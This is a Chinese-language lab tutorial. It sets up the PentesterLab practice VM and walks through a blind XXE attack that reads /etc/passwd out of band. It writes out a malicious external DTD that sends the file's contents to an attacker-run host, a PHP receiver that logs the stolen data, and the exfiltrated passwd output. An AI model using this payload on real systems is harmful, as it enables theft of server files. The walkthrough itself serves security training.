一.PentesterLab靶场搭建(实验环境搭建)

介绍：PentesterLab 是一个全面的漏洞演示平台，但是它是收费的，我们这里只使用它的 xxe 演示案例。

安装 PentesterLab 虚拟机:下载好镜像：
1.打开VMware新建虚拟机，选择典型就行。

然后选择我们的镜像，下一步：

选择linux，和linux3.x不要选64位的。

下一步，然后自己调节文件保存位置：

磁盘空间默认就行：

点击自定义硬件：

我们去调一下内存，把内存调到一个g。

然后我们点击关闭再点击完成即可：

我们打开虚拟机：

输入ifconfig查看ip：192.168.112.18

我们打开浏览器，看到一下页面显示则靶场安装成功。

二.XXE无回显文件读取

我们需要建立一个外部的 dtd 文件，一个用于接收数据的 php 文件，以及存储数据的数据文件。
1、建立 dtd 外部实体文件：
# cd /var/www/html/
# vim test.dtd #插入以下内容
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.112.128/xxe.php?pass=%p1;'>">
%p2;
注：% p1 定义一个参数实体，%和 p1 之间有一个空格，用于接收 file:///etc/passwd 的内
容，%p1 引用参数实体，参数实体只能在 DTD 文件中被引用。
2、建立 php 文件
└─# vim xxe.php #插入以下内容
<?php
$pass=$_GET['pass'];
file_put_contents('pass.txt',$pass);
?>
3、创建存储数据的文件
└─# touch pass.txt
4、修改文件权限
└─# chown -R www-data:www-data /var/www/html/*
5、启动 apache2
└─# systemctl start apache2
6、测试 php 文件能够正常写入数据
└─# curl http://192.168.1.53/xxe.php?pass=1
└─# cat pass.txt
1

到这里基本工作就完成了。

下面我们进入靶场点击左上角login，利用bp进行抓包。

我们修改请求：

放包就行。

我们就成功带外出了etc/passwd的内容：

root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
play:x:100:65534:Linux User,,,:/opt/play-2.1.3/xxe/:/bin/false
mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false